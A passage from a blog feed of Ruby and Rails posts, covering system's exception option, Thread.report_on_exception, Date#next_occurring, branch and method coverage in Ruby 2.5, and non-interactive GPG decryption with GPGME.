 =&gt; true</code></pre><p>Let's suppose we have a migration that is trying to add a column to a table which does not exist. In this case, the <code>system</code> command for running migrations will return false.</p><pre><code class="language-ruby">irb&gt; system('rake db:migrate')
== 20180311211836 AddFirstNameToAdmins: migrating =============================
-- add_column(:admins, :first_name, :string)
rake aborted!
StandardError: An error has occurred, this and all later migrations canceled:
PG::UndefinedTable: ERROR:  relation &quot;admins&quot; does not exist
: ALTER TABLE &quot;admins&quot; ADD &quot;first_name&quot; character varying
...
Tasks: TOP =&gt; db:migrate
(See full trace by running task with --trace)
 =&gt; false</code></pre><p>As we can see, even when there is a failure in executing system commands, the return value is false. 
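</p><p>These return values are easy to see in isolation. Here is a minimal, Rails-independent sketch; it shells out to the <code>ruby</code> binary itself, so the commands and their exit statuses are the only assumptions.</p>

```ruby
# Minimal sketch of Kernel#system's three possible return values.
ok      = system("ruby", "-e", "exit 0")   # command exited with status 0
failed  = system("ruby", "-e", "exit 1")   # command ran but exited non-zero
missing = system("no-such-command-xyz")    # command could not be started at all

p ok      # => true
p failed  # => false
p missing # => nil
```

<p>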
Ruby does not raise an exception in those cases.</p><p>However, we can use <code>raise</code> explicitly to raise an exception and halt the setup script execution.</p><pre><code class="language-ruby">irb&gt; system('rake db:migrate') || raise('Failed to run migrations')
== 20180311211836 AddFirstNameToAdmins: migrating =============================
-- add_column(:admins, :first_name, :string)
rake aborted!
StandardError: An error has occurred, this and all later migrations canceled:
PG::UndefinedTable: ERROR:  relation &quot;admins&quot; does not exist
: ALTER TABLE &quot;admins&quot; ADD &quot;first_name&quot; character varying
...
Tasks: TOP =&gt; db:migrate
(See full trace by running task with --trace)
Traceback (most recent call last):
        2: from /Users/amit/.rvm/rubies/ruby-2.5.0/bin/irb:11:in `&lt;main&gt;'
        1: from (irb):4
RuntimeError (Failed to run migrations)</code></pre><h4>Ruby 2.6.0-preview1</h4><p>Ruby 2.6 makes our lives easier by providing an <code>exception: true</code> option, so that we do not need to use <code>raise</code> explicitly to halt script execution.</p><pre><code class="language-ruby">irb&gt; system('rake db:migrate', exception: true)
== 20180311211836 AddFirstNameToAdmins: migrating =============================
-- add_column(:admins, :first_name, :string)
rake aborted!
StandardError: An error has occurred, this and all later migrations canceled:
PG::UndefinedTable: ERROR:  relation &quot;admins&quot; does not exist
: ALTER TABLE &quot;admins&quot; ADD &quot;first_name&quot; character varying
...
Tasks: TOP =&gt; db:migrate
(See full trace by running task with --trace)
Traceback (most recent call last):
        3: from /Users/amit/.rvm/rubies/ruby-2.6.0-preview1/bin/irb:11:in `&lt;main&gt;'
        2: from (irb):2
        1: from (irb):2:in `system'
RuntimeError (Command failed with exit 1: rake)</code></pre><p>Ruby 2.6 works the same way as previous Ruby versions when used without the <code>exception</code> option, or with <code>exception</code> set to false.</p><pre><code class="language-ruby">irb&gt; system('rake db:migrate', exception: false)
== 20180311211836 AddFirstNameToAdmins: migrating =============================
-- add_column(:admins, :first_name, :string)
rake aborted!
StandardError: An error has occurred, this and all later migrations canceled:
PG::UndefinedTable: ERROR:  relation &quot;admins&quot; does not exist
: ALTER TABLE &quot;admins&quot; ADD &quot;first_name&quot; character varying
...
Tasks: TOP =&gt; db:migrate
(See full trace by running task with --trace)
 =&gt; false</code></pre><p>Here is the relevant <a href="https://github.com/ruby/ruby/commit/fb29cffab0">commit</a> and <a href="https://bugs.ruby-lang.org/issues/14386">discussion</a> for this change.</p><p><code>system</code> is not the only way to execute commands like these. We wrote <a href="https://blog.bigbinary.com/2012/10/18/backtick-system-exec-in-ruby.html">a blog</a> 6 years ago which discusses the differences between running commands using <code>backtick</code>, <code>exec</code>, <code>sh</code>, <code>popen3</code>, <code>popen2e</code> and <code>Process.spawn</code>.</p><p>The Chinese version of this blog is available <a href="http://madao.me/yi-ruby-2-6-kernel-de-system-fang-fa-zeng-jia-shi-fou-pao-chu-yi-chang-can-shu/">here</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Ruby 2.5 adds Thread.report_on_exception by default]]></title>
       <author><name>Vishal Telangre</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-2-5-enables-thread-report_on_exception-by-default"/>
      <updated>2018-04-18T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-2-5-enables-thread-report_on_exception-by-default</id>
<content type="html"><![CDATA[<p>Let's see what happens when an exception is raised inside a thread.</p><pre><code class="language-ruby">division_thread = Thread.new do
  puts &quot;Calculating 4/0 in division_thread&quot;
  puts &quot;Result is: #{4/0}&quot;
  puts &quot;Exiting from division_thread&quot;
end

sleep 1

puts &quot;In the main thread&quot;</code></pre><p>Executing it looks like this.</p><pre><code class="language-ruby">$ RBENV_VERSION=2.4.0 ruby thread_example_1.rb
Calculating 4/0 in division_thread
In the main thread</code></pre><p>Note that the last two lines from the block were not printed. Also notice that after the failure in the thread, the program continued to run in the main thread. That's why we got the message &quot;In the main thread&quot;.</p><p>This is because the default behavior of Ruby is to silently ignore exceptions in threads and to continue executing in the main thread.</p><h2>Enabling abort_on_exception to stop on failure</h2><p>If we want an exception in a thread to stop further processing both in the thread and in the main thread, then we can enable <code>Thread[.#]abort_on_exception</code> on that thread.</p><p>Notice that in the code below we are using <code>Thread.current</code>.</p><pre><code class="language-ruby">division_thread = Thread.new do
  Thread.current.abort_on_exception = true
  puts &quot;Calculating 4/0 in division_thread&quot;
  puts &quot;Result is: #{4/0}&quot;
  puts &quot;Exiting from division_thread&quot;
end

sleep 1

puts &quot;In the main thread&quot;</code></pre><pre><code class="language-ruby">$ RBENV_VERSION=2.4.0 ruby thread_example_2.rb
Calculating 4/0 in division_thread
thread_example_2.rb:5:in `/': divided by 0 (ZeroDivisionError)
  from thread_example_2.rb:5:in `block in &lt;main&gt;'</code></pre><p>As we can see, once an exception was encountered in the thread, processing stopped both in the thread and in the main thread.</p><p>Note that <code>Thread.current.abort_on_exception = true</code> activates this behavior only for the current thread.</p><p>If we want this behavior globally for all threads, then we need to use <code>Thread.abort_on_exception = true</code>.</p><h2>Running program with debug flag to stop on failure</h2><p>Let's run the original code with the <code>--debug</code> option.</p><pre><code class="language-ruby">$ RBENV_VERSION=2.4.0 ruby --debug thread_example_1.rb
thread_example_1.rb:1: warning: assigned but unused variable - division_thread
Calculating 4/0 in division_thread
Exception `ZeroDivisionError' at thread_example_1.rb:3 - divided by 0
Exception `ZeroDivisionError' at thread_example_1.rb:7 - divided by 0
thread_example_1.rb:3:in `/': divided by 0 (ZeroDivisionError)
  from thread_example_1.rb:3:in `block in &lt;main&gt;'</code></pre><p>In this case the exception is printed in detail, and the code in the main thread was not executed.</p><p>Usually, when we execute a program with the <code>--debug</code> option, the behavior of the program does not change; we expect the program to print more information, not to behave differently. However, in this case the <code>--debug</code> option changes the behavior of the program.</p><h2>Running program with join on thread to stop on failure</h2><p>If a thread raises an exception while the <code>abort_on_exception</code> and <code>$DEBUG</code> flags are not set, then that exception will be processed at the time the thread is joined.</p><pre><code class="language-ruby">division_thread = Thread.new do
  puts &quot;Calculating 4/0 in division_thread&quot;
  puts &quot;Result is: #{4/0}&quot;
  puts &quot;Exiting from division_thread&quot;
end

division_thread.join

puts &quot;In the main thread&quot;</code></pre><pre><code class="language-ruby">$ RBENV_VERSION=2.4.0 ruby thread_example_3.rb
Calculating 4/0 in division_thread
thread_example_3.rb:3:in `/': divided by 0 (ZeroDivisionError)
  from thread_example_3.rb:3:in `block in &lt;main&gt;'</code></pre><p>Both <code>Thread#join</code> and <code>Thread#value</code> will stop processing in the thread and in the main thread once an exception is encountered.</p><h2>Introduction of report_on_exception in Ruby 2.4</h2><p>Almost 6 years ago, <a href="https://github.com/headius">Charles Nutter (headius)</a> proposed that exceptions raised in threads should be automatically logged and reported, by default. To make his point, he explained issues similar to what we discussed above about Ruby's behavior of silently ignoring exceptions in threads. <a href="https://bugs.ruby-lang.org/issues/6647">Here</a> is the relevant discussion on his proposal.</p><p>Following are some of the notable points discussed.</p><ul><li>Enabling <code>Thread[.#]abort_on_exception</code> by default is not always a good idea.</li><li>There should be a flag which, if enabled, would print the thread-killing exception info.</li><li>In many cases, people spawn one-off threads which are not hard-referenced using <code>Thread#join</code> or <code>Thread#value</code>. Such threads get garbage collected. Should the thread-killing exception be reported at the time of garbage collection if such a flag is enabled?</li><li>Should it warn using <a href="https://ruby-doc.org/core-2.4.0/Warning.html#method-i-warn"><code>Warning#warn</code></a> or write to the STDERR device while reporting?</li></ul><p>Charles Nutter suggested that a configurable global flag <code>Thread.report_on_exception</code> and an instance-level flag <code>Thread#report_on_exception</code> should be implemented, with a default value of <code>true</code>. When set to <code>true</code>, it should print exception information.</p><p>Matz and other core members approved that <code>Thread[.#]report_on_exception</code> could be implemented with its default value set to <code>false</code>.</p><p>Charles Nutter, Benoit Daloze and others argued that it should be <code>true</code> by default so that programmers can be aware of threads silently disappearing because of exceptions.</p><p>Shyouhei Urabe <a href="https://bugs.ruby-lang.org/issues/6647#note-41">advised</a> that, due to some technical challenges, the default value should be set to <code>false</code> so that the feature could land in Ruby; once the feature was in, the default value could be changed in a later release.</p><p><a href="https://github.com/nobu">Nobuyoshi Nakada (nobu)</a> pushed an <a href="https://github.com/ruby/ruby/commit/2e71c752787e0c7659bd5e89b6c5d433eddfe13a">implementation</a> of <code>Thread[.#]report_on_exception</code> with a default value set to <code>false</code>. It was released in Ruby 2.4.0.</p><p>Let's try enabling <code>report_on_exception</code> globally using <code>Thread.report_on_exception</code>.</p><pre><code class="language-ruby">Thread.report_on_exception = true

division_thread = Thread.new do
  puts &quot;Calculating 4/0 in division_thread&quot;
  puts &quot;Result is: #{4/0}&quot;
  puts &quot;Exiting from division_thread&quot;
end

addition_thread = Thread.new do
  puts &quot;Calculating nil+4 in addition_thread&quot;
  puts &quot;Result is: #{nil+4}&quot;
  puts &quot;Exiting from addition_thread&quot;
end

sleep 1

puts &quot;In the main thread&quot;</code></pre><pre><code class="language-ruby">$ RBENV_VERSION=2.4.0 ruby thread_example_4.rb
Calculating 4/0 in division_thread
#&lt;Thread:0x007fb10f018200@thread_example_4.rb:3 run&gt; terminated with exception:
thread_example_4.rb:5:in `/': divided by 0 (ZeroDivisionError)
  from thread_example_4.rb:5:in `block in &lt;main&gt;'
Calculating nil+4 in addition_thread
#&lt;Thread:0x007fb10f01aca8@thread_example_4.rb:9 run&gt; terminated with exception:
thread_example_4.rb:11:in `block in &lt;main&gt;': undefined method `+' for nil:NilClass (NoMethodError)
In the main thread</code></pre><p>It now reports the exceptions in all threads. It prints that <code>Thread:0x007fb10f018200</code> was <code>terminated with exception: divided by 0 (ZeroDivisionError)</code>. Similarly, another thread <code>Thread:0x007fb10f01aca8</code> was <code>terminated with exception: undefined method '+' for nil:NilClass (NoMethodError)</code>.</p><p>Instead of enabling it globally for all threads, we can enable it for a particular thread using the instance-level <code>Thread#report_on_exception</code>.</p><pre><code class="language-ruby">division_thread = Thread.new do
  puts &quot;Calculating 4/0 in division_thread&quot;
  puts &quot;Result is: #{4/0}&quot;
  puts &quot;Exiting from division_thread&quot;
end

addition_thread = Thread.new do
  Thread.current.report_on_exception = true
  puts &quot;Calculating nil+4 in addition_thread&quot;
  puts &quot;Result is: #{nil+4}&quot;
  puts &quot;Exiting from addition_thread&quot;
end

sleep 1

puts &quot;In the main thread&quot;</code></pre><p>In the above case we have enabled the <code>report_on_exception</code> flag just for <code>addition_thread</code>.</p><p>Let's execute it.</p><pre><code class="language-ruby">$ RBENV_VERSION=2.4.0 ruby thread_example_5.rb
Calculating 4/0 in division_thread
Calculating nil+4 in addition_thread
#&lt;Thread:0x007f8e6b007f70@thread_example_5.rb:7 run&gt; terminated with exception:
thread_example_5.rb:11:in `block in &lt;main&gt;': undefined method `+' for nil:NilClass (NoMethodError)
In the main thread</code></pre><p>Notice how it didn't report the exception which killed <code>division_thread</code>. As expected, it reported the exception that killed <code>addition_thread</code>.</p><p>With the above changes, Ruby reports an exception as soon as it is encountered. However, if these threads are joined, they will still raise the exception.</p><pre><code class="language-ruby">division_thread = Thread.new do
  Thread.current.report_on_exception = true
  puts &quot;Calculating 4/0 in division_thread&quot;
  puts &quot;Result is: #{4/0}&quot;
  puts &quot;Exiting from division_thread&quot;
end

begin
  division_thread.join
rescue =&gt; exception
  puts &quot;Explicitly caught - #{exception.class}: #{exception.message}&quot;
end

puts &quot;In the main thread&quot;</code></pre><pre><code class="language-ruby">$ RBENV_VERSION=2.4.0 ruby thread_example_6.rb
Calculating 4/0 in division_thread
#&lt;Thread:0x007f969d00d828@thread_example_6.rb:1 run&gt; terminated with exception:
thread_example_6.rb:5:in `/': divided by 0 (ZeroDivisionError)
  from thread_example_6.rb:5:in `block in &lt;main&gt;'
Explicitly caught - ZeroDivisionError: divided by 0
In the main thread</code></pre><p>Note that we were still able to handle the exception raised in <code>division_thread</code> after joining it, even though it had already been reported due to the <code>Thread#report_on_exception</code> flag.</p><h2>report_on_exception defaults to true in Ruby 2.5</h2><p><a href="https://github.com/eregon">Benoit Daloze (eregon)</a> strongly advocated that both <code>Thread.report_on_exception</code> and <code>Thread#report_on_exception</code> should have a default value of <code>true</code>. <a href="https://bugs.ruby-lang.org/issues/14143">Here</a> is the relevant feature request.</p><p>After <a href="https://bugs.ruby-lang.org/issues/14143#note-9">approval from Matz</a>, Benoit Daloze pushed the <a href="https://github.com/ruby/ruby/search?utf8=%E2%9C%93&amp;q=Feature+%5C%2314143&amp;type=Commits">implementation</a>, fixing the failing tests and silencing the unnecessary verbose warnings.</p><p>It was released as part of Ruby 2.5.</p><p>Now, in Ruby 2.5, we can simply write this.</p><pre><code class="language-ruby">division_thread = Thread.new do
  puts &quot;Calculating 4/0 in division_thread&quot;
  puts &quot;Result is: #{4/0}&quot;
  puts &quot;Exiting from division_thread&quot;
end

addition_thread = Thread.new do
  puts &quot;Calculating nil+4 in addition_thread&quot;
  puts &quot;Result is: #{nil+4}&quot;
  puts &quot;Exiting from addition_thread&quot;
end

sleep 1

puts &quot;In the main thread&quot;</code></pre><p>Let's execute it with Ruby 2.5.</p><pre><code class="language-ruby">$ RBENV_VERSION=2.5.0 ruby thread_example_7.rb
Calculating 4/0 in division_thread
#&lt;Thread:0x00007f827689a238@thread_example_7.rb:1 run&gt; terminated with exception (report_on_exception is true):
Traceback (most recent call last):
  1: from thread_example_7.rb:3:in `block in &lt;main&gt;'
thread_example_7.rb:3:in `/': divided by 0 (ZeroDivisionError)
Calculating nil+4 in addition_thread
#&lt;Thread:0x00007f8276899b58@thread_example_7.rb:7 run&gt; terminated with exception (report_on_exception is true):
Traceback (most recent call last):
thread_example_7.rb:9:in `block in &lt;main&gt;': undefined method `+' for nil:NilClass (NoMethodError)
In the main thread</code></pre><p>We can disable thread exception reporting globally using <code>Thread.report_on_exception = false</code>, or for a particular thread using <code>Thread.current.report_on_exception = false</code>.</p><h2>Future Possibilities</h2><p>In addition to this feature, Charles Nutter also <a href="https://bugs.ruby-lang.org/issues/14143#note-4">suggested</a> that it would be good to have a callback handler which accepts a block to be executed when a thread dies due to an exception. The callback handler could be registered at the global level or for a specific thread.</p><pre><code class="language-ruby">Thread.on_exception do
  # some stuff
end</code></pre><p>In the absence of such a handler, libraries need to resort to custom code to handle exceptions. <a href="https://github.com/mperham/sidekiq/blob/a60a91d3dd857592a532965f0701d285f13f28f1/lib/sidekiq/util.rb#L15-L27">Here is how</a> Sidekiq handles exceptions raised in threads.</p><p>An important thing to note is that <code>report_on_exception</code> does not change the behavior of the code. It only adds reporting when a thread dies, and when it comes to dying threads, more reporting is a good thing.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5.2 Date#prev_occurring & Date#next_occurring]]></title>
       <author><name>Sushant Mittal</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-2-adds-date-methods-to-return-specified-next-or-previous-occurring-day-of-week"/>
      <updated>2018-04-17T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-2-adds-date-methods-to-return-specified-next-or-previous-occurring-day-of-week</id>
      <content type="html"><![CDATA[<p>Before Rails 5.2, this is how we would find the next or previous occurring day of the week.</p><p><strong>Assume that the current date is Tue, 27 Feb 2018.</strong></p><pre><code class="language-ruby"># find previous thursday
&gt;&gt; Date.yesterday.beginning_of_week(:thursday)
=&gt; Thu, 22 Feb 2018

# find next thursday
&gt;&gt; Date.tomorrow.end_of_week(:friday)
=&gt; Thu, 01 Mar 2018</code></pre><p>Rails 5.2 has <a href="https://github.com/rails/rails/pull/26600">introduced the methods</a> <code>Date#prev_occurring</code> and <code>Date#next_occurring</code> to find the next &amp; previous occurring day of the week.</p><pre><code class="language-ruby"># find previous thursday
&gt;&gt; Date.prev_occurring(:thursday)
=&gt; Thu, 22 Feb 2018

# find next thursday
&gt;&gt; Date.next_occurring(:thursday)
=&gt; Thu, 01 Mar 2018</code></pre>]]></content>
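For readers outside Rails, the same lookup can be approximated in plain Ruby using `Date#cwday` (Monday == 1). This is a rough sketch of the behavior, not Rails' actual implementation; the helper names mirror the Rails methods but are standalone functions here:

```ruby
require "date"

DAYS = %i[monday tuesday wednesday thursday friday saturday sunday]

# Rough plain-Ruby approximation of the Rails behavior (not Rails' code).
def next_occurring(from, day_name)
  target = DAYS.index(day_name) + 1   # Date#cwday: Monday == 1 .. Sunday == 7
  diff = (target - from.cwday) % 7
  diff = 7 if diff.zero?              # always a strictly future date, like Rails
  from + diff
end

def prev_occurring(from, day_name)
  target = DAYS.index(day_name) + 1
  diff = (from.cwday - target) % 7
  diff = 7 if diff.zero?              # always a strictly past date
  from - diff
end

today = Date.new(2018, 2, 27)         # Tue, 27 Feb 2018, as in the post
puts prev_occurring(today, :thursday) # 2018-02-22
puts next_occurring(today, :thursday) # 2018-03-01
```

Note the `diff = 7` adjustment: asking for the next Thursday on a Thursday returns next week's Thursday, matching the "strictly next/previous" semantics of the Rails methods.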
    </entry><entry>
       <title><![CDATA[Ruby 2.5 supports measuring branch and method coverages]]></title>
       <author><name>Vishal Telangre</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-2-5-supports-measuring-branch-and-method-coverages"/>
      <updated>2018-04-11T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-2-5-supports-measuring-branch-and-method-coverages</id>
      <content type="html"><![CDATA[<p>Ruby has come with <a href="https://ruby-doc.org/stdlib-2.5.0/libdoc/coverage/rdoc/Coverage.html">Coverage</a>, a simple standard library for test coverage measurement, for a long time.</p><h2>Before Ruby 2.5</h2><p>Before Ruby 2.5, we could measure just the line coverage using <code>Coverage</code>.</p><p>Line coverage tells us whether a line is executed or not and, if executed, how many times that line was executed.</p><p>We have a file called <code>score.rb</code>.</p><pre><code class="language-ruby">score = 33

if score &gt;= 40
  p :PASSED
else
  p :FAILED
end</code></pre><p>Now create another file <code>score_coverage.rb</code>.</p><pre><code class="language-ruby">require &quot;coverage&quot;

Coverage.start
load &quot;score.rb&quot;
p Coverage.result</code></pre><p>We used the <code>Coverage#start</code> method to measure the coverage of the <code>score.rb</code> file. <code>Coverage#result</code> returns the coverage result.</p><p>Let's run it with Ruby 2.4.</p><pre><code class="language-ruby">$ RBENV_VERSION=2.4.0 ruby score_coverage.rb
:FAILED
{ &quot;score.rb&quot;=&gt; [1, nil, 1, 0, nil, 1, nil] }</code></pre><p>Let's look at the output. Each value in the array <code>[1, nil, 1, 0, nil, 1, nil]</code> denotes the count of executions by the interpreter for each line in the <code>score.rb</code> file.</p><p>This array is also called the &quot;line coverage&quot; of the <code>score.rb</code> file.</p><p>A <code>nil</code> value in the line coverage array means coverage is disabled for that particular line number or it is not a relevant line. Lines like <code>else</code>, <code>end</code> and blank lines have line coverage disabled.</p><p>Here's how we can read the above line coverage result.</p><ul><li>Line number 1 (i.e. 0th index in the above result array) was executed once.</li><li>Coverage was disabled for line number 2 (i.e. index 1) as it is blank.</li><li>Line number 3 (i.e. index 2) was executed once.</li><li>Line number 4 did not execute.</li><li>Coverage was disabled for line number 5 as it contains only the <code>else</code> clause.</li><li>Line number 6 was executed once.</li><li>Coverage was disabled for line number 7 as it contains just the <code>end</code> keyword.</li></ul><h2>After Ruby 2.5</h2><p>There was a <a href="https://github.com/ruby/ruby/pull/511">pull request</a> opened in 2014 to add method coverage and decision coverage metrics in Ruby. It was <a href="https://github.com/ruby/ruby/pull/511#issuecomment-328753499">rejected</a> by <a href="https://github.com/mame">Yusuke Endoh</a> as he saw some issues with it and mentioned that he was also working on a similar implementation.</p><p>In Ruby 2.5, Yusuke Endoh <a href="https://bugs.ruby-lang.org/issues/13901">added the branch coverage and method coverage features</a> to the <code>Coverage</code> library.</p><p>Let's see what's changed in the <code>Coverage</code> library in Ruby 2.5.</p><h3>Line Coverage</h3><p>If we execute the above example using Ruby 2.5, we will see no change in the result.</p><pre><code class="language-ruby">$ RBENV_VERSION=2.5.0 ruby score_coverage.rb
:FAILED
{ &quot;score.rb&quot; =&gt; [1, nil, 1, 0, nil, 1, nil] }</code></pre><p>This behavior is maintained to ensure that the <code>Coverage#start</code> API stays 100% backward compatible.</p><p>If we explicitly enable the <code>lines</code> option on the <code>Coverage#start</code> method in the above <code>score_coverage.rb</code> file, the coverage result looks different.</p><pre><code class="language-ruby">require &quot;coverage&quot;

Coverage.start(lines: true)
load &quot;score.rb&quot;
p Coverage.result</code></pre><pre><code class="language-ruby">$ RBENV_VERSION=2.5.0 ruby score_coverage.rb
:FAILED
{ &quot;score.rb&quot; =&gt; {
    :lines =&gt; [1, nil, 1, 0, nil, 1, nil]
  }
}</code></pre><p>We can see that the coverage result is now a hash which reads that the <code>score.rb</code> file has <code>lines</code> coverage of <code>[1, nil, 1, 0, nil, 1, nil]</code>.</p><h3>Branch Coverage</h3><p>Branch coverage helps us identify which branches are executed and which ones are not.</p><p>Let's see how to get branch coverage.</p><p>We will update <code>score_coverage.rb</code> by enabling the <code>branches</code> option.</p><pre><code class="language-ruby">require &quot;coverage&quot;

Coverage.start(branches: true)
load &quot;score.rb&quot;
p Coverage.result</code></pre><pre><code class="language-ruby">$ RBENV_VERSION=2.5.0 ruby score_coverage.rb
:FAILED
{ &quot;score.rb&quot; =&gt;
  { :branches =&gt; {
      [:if, 0, 3, 0, 7, 3] =&gt; {
        [:then, 1, 4, 2, 4, 15] =&gt; 0,
        [:else, 2, 6, 2, 6, 15] =&gt; 1
      }
    }
  }
}</code></pre><p>Here is how to read the data in the array.</p><pre><code class="language-ruby">[
  BRANCH_TYPE,
  UNIQUE_ID,
  START_LINE_NUMBER,
  START_COLUMN_NUMBER,
  END_LINE_NUMBER,
  END_COLUMN_NUMBER
]</code></pre><p>Please note that column numbers start from 0 and line numbers start from 1.</p><p>Let's try to read the above printed branch coverage result.</p><p><code>[:if, 0, 3, 0, 7, 3]</code> reads that the <code>if</code> statement starts at line 3 &amp; column 0 and ends at line 7 &amp; column 3.</p><p><code>[:then, 1, 4, 2, 4, 15]</code> reads that the <code>then</code> clause starts at line 4 &amp; column 2 and ends at line 4 &amp; column 15.</p><p>Similarly, <code>[:else, 2, 6, 2, 6, 15]</code> reads that the <code>else</code> clause starts at line 6 &amp; column 2 and ends at line 6 &amp; column 15.</p><p>Most importantly, as per the branch coverage format, we can see that the branch from <code>if</code> to <code>then</code> was never executed since <code>COUNTER</code> is <code>0</code>. The other branch from <code>if</code> to <code>else</code> was executed once since <code>COUNTER</code> is <code>1</code>.</p><h3>Method Coverage</h3><p>Measuring method coverage helps us identify which methods were invoked and which were not.</p><p>We have a file <code>grade_calculator.rb</code>.</p><pre><code class="language-ruby">students_scores = { &quot;Sam&quot; =&gt; [53, 91, 72],
                    &quot;Anna&quot; =&gt; [91, 97, 95],
                    &quot;Bob&quot; =&gt; [33, 69, 63] }

def average(scores)
  scores.reduce(&amp;:+)/scores.size
end

def grade(average_score)
  case average_score
  when 90.0..100.0 then :A
  when 80.0..90.0 then :B
  when 70.0..80.0 then :C
  when 60.0..70.0 then :D
  else :F
  end
end

def greet
  puts &quot;Congratulations!&quot;
end

def warn
  puts &quot;Try hard next time!&quot;
end

students_scores.each do |student_name, scores|
  achieved_grade = grade(average(scores))
  puts &quot;#{student_name}, you've got '#{achieved_grade}' grade.&quot;
  if achieved_grade == :A
    greet
  elsif achieved_grade == :F
    warn
  end
  puts
end</code></pre><p>To measure method coverage of the above file, let's create <code>grade_calculator_coverage.rb</code> by enabling the <code>methods</code> option on the <code>Coverage#start</code> method.</p><pre><code class="language-ruby">require &quot;coverage&quot;

Coverage.start(methods: true)
load &quot;grade_calculator.rb&quot;
p Coverage.result</code></pre><p>Let's run it using Ruby 2.5.</p><pre><code class="language-ruby">$ RBENV_VERSION=2.5.0 ruby grade_calculator_coverage.rb
Sam, you've got 'C' grade.

Anna, you've got 'A' grade.
Congratulations!

Bob, you've got 'F' grade.
Try hard next time!

{ &quot;grade_calculator.rb&quot; =&gt; {
    :methods =&gt; {
      [Object, :warn, 23, 0, 25, 3] =&gt; 1,
      [Object, :greet, 19, 0, 21, 3] =&gt; 1,
      [Object, :grade, 9, 0, 17, 3] =&gt; 3,
      [Object, :average, 5, 0, 7, 3] =&gt; 3
    }
  }
}</code></pre><p>The format of the method coverage result is defined as shown below.</p><pre><code class="language-ruby">[ CLASS_NAME,
  METHOD_NAME,
  START_LINE_NUMBER,
  START_COLUMN_NUMBER,
  END_LINE_NUMBER,
  END_COLUMN_NUMBER ]</code></pre><p>Therefore, <code>[Object, :grade, 9, 0, 17, 3] =&gt; 3</code> reads that the <code>Object#grade</code> method, which spans from line 9 &amp; column 0 to line 17 &amp; column 3, was invoked 3 times.</p><h2>Conclusion</h2><p>We can also measure all coverages at once.</p><pre><code class="language-ruby">Coverage.start(lines: true, branches: true, methods: true)</code></pre><p>What's the use of these different types of coverages anyway?</p><p>Well, one use case is to integrate this in a test suite and to determine which lines, branches and methods are executed and which ones are not executed by the tests. Further, we can sum these up and evaluate the total coverage of a test suite.</p><p>The author of this feature, Yusuke Endoh, has released the <a href="https://github.com/mame/coverage-helpers">coverage-helpers</a> gem which allows further advanced manipulation and processing of coverage results obtained using <code>Coverage#result</code>.</p>]]></content>
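To tie the three modes together, here is a self-contained sketch (the demo file name, method name and score are invented for this example) that generates a small file and measures it with all options enabled at once:

```ruby
require "coverage"
require "tmpdir"

# Self-contained sketch: measure line, branch and method coverage together
# (Ruby 2.5+). The demo file and its contents are made up for illustration.
dir = Dir.mktmpdir
File.write(File.join(dir, "demo.rb"), <<~RUBY)
  def passed?(score)
    score >= 40 ? :PASSED : :FAILED
  end

  passed?(33)
RUBY
path = File.realpath(File.join(dir, "demo.rb"))

Coverage.start(lines: true, branches: true, methods: true)
load path
result = Coverage.result.fetch(path)

p result[:lines]   # per-line execution counts (nil for irrelevant lines)
p result[:methods] # the [Object, :passed?, ...] key maps to its invocation count
```

As in the post, `Coverage.result` stops measurement and returns one hash per measured file, here keyed by the loaded file's path, with `:lines`, `:branches` and `:methods` sub-hashes.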
    </entry><entry>
       <title><![CDATA[Gpg decryption without pin entry pop up using GPGME]]></title>
       <author><name>Sushant Mittal</name></author>
      <link href="https://www.bigbinary.com/blog/gpg-decryption-without-pin-entry-pop-up-using-gpgme"/>
      <updated>2018-03-27T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/gpg-decryption-without-pin-entry-pop-up-using-gpgme</id>
      <content type="html"><![CDATA[<p>In one of our projects, we implemented GPG decryption.</p><p>What is GPG?</p><blockquote><p>GPG is a complete and free implementation of the OpenPGP standard as defined by <a href="https://www.ietf.org/rfc/rfc4880.txt">RFC4880</a> (also known as PGP).</p></blockquote><p>We used the <a href="https://github.com/ueno/ruby-gpgme">GPGME</a> gem for this purpose. It provides three levels of API. In our case, we used <a href="https://github.com/ueno/ruby-gpgme#crypto">Crypto</a>, which has the high-level convenience methods to encrypt, decrypt, sign and verify signatures.</p><p>We needed to import a private key for decrypting a file that was encrypted using the paired public key. First, let's import the required private key.</p><pre><code class="language-ruby">GPGME::Key.import File.open('certs/pgp.key')</code></pre><p>Let's decrypt the file.</p><pre><code class="language-ruby">crypto = GPGME::Crypto.new
options = { output: File.open('file.csv', 'wb') }

crypto.decrypt File.open('file.csv.gpg'), options</code></pre><p>The above code has one problem. It will open a pop-up asking for the password that was used when the public and private keys were generated.</p><p>To support password input without a pop-up, we updated the code as below.</p><pre><code class="language-ruby">crypto = GPGME::Crypto.new
options = {
            output: File.open('file.csv', 'wb'),
            pinentry_mode: GPGME::PINENTRY_MODE_LOOPBACK,
            password: 'welcome'
          }

crypto.decrypt File.open('file.csv.gpg'), options</code></pre><p>Here, the <code>pinentry_mode</code> option allows password input without a pop-up.</p><p>We did not use the latest version of GPG since it does not support the <code>pinentry_mode</code> option. Instead, we used version <code>2.1.20</code>, which has support for this option. <a href="https://gist.github.com/mattrude/3883a3801613b048d45b">Here</a> are the build instructions for that.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Practical usage of identity function]]></title>
       <author><name>Rohit Kumar</name></author>
      <link href="https://www.bigbinary.com/blog/practical-usage-of-identity-function"/>
      <updated>2018-03-20T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/practical-usage-of-identity-function</id>
